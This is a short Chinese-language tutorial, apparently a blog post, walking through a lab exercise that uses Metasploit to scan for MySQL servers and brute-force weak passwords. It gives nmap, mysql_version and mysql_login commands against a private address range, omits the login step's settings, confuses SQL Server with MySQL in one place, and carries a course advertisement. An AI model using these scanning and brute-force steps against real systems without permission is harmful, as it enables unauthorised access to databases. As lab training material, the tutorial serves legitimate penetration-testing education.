一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。那么如何利用Metasploit(msf)进行MySQL弱口令爆破呢?接下来让我们一起学习!
二、资源装备
1.安装好 Kali linux 的虚拟机一台
2.搭建好Sql server的靶机一个;
3.整装待发的小白一个。
专栏
Kali Linux渗透测试与黑客编程篇
作者:Kali与编程
199币
249人已购
查看
三、战略安排
3.1 设置受害者靶机跟攻击者主机的网络模式为NAT模式,如下图所示。
3.2 查看受害者主机的IP地址,如下图所示。
命令:ifconfig
3.3 针对目标受害者主机进行信息收集,如下图所示。
命令:nmap -sV IP
例子:nmap -sV 192.168.126.170-200
3.4 扫描结果如下图所示,目标攻击者主机开启了3306危险端口。
3.5 利用Metasploit(msf)渗透框架对目标主机进行信息收集,如下图所示。
命令:msfconsole
3.6 利用msf检索SQL相关攻击模块,如下图所示。
命令:search mysql_version
3.7 利用检索到的漏洞利用模块,如下图所示。
命令:use auxiliary/scanner/mysql/mysql_version
3.8 查看相关参数,如下图所示。
命令:show options
3.9 设置参数,如下图所示。
命令:set rhosts 192.168.126.170-200
命令:set threads 50
3.10 运行攻击模块,如下图所示。
命令:run
3.11 返回上层目录,如下图所示。
命令:back
3.12 检索数据库攻击模块,如下图所示。
命令:search mysql_login
3.13 利用检索到的攻击模块,如下图所示。
命令:use auxiliary/scanner/mysql/mysql_login
3.14 查看相关参数,如下图所示。
命令:show options
3.15 设置相关参数,如下图所示。
3.16 设置好参数进行攻击,如下图所示。
命令:run
PS:到此学习完毕,谢谢观看,获取更多干货请持续关注本号!
原创不易,各位看官记得好评加关注哦!你也可点击了解更多,或搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
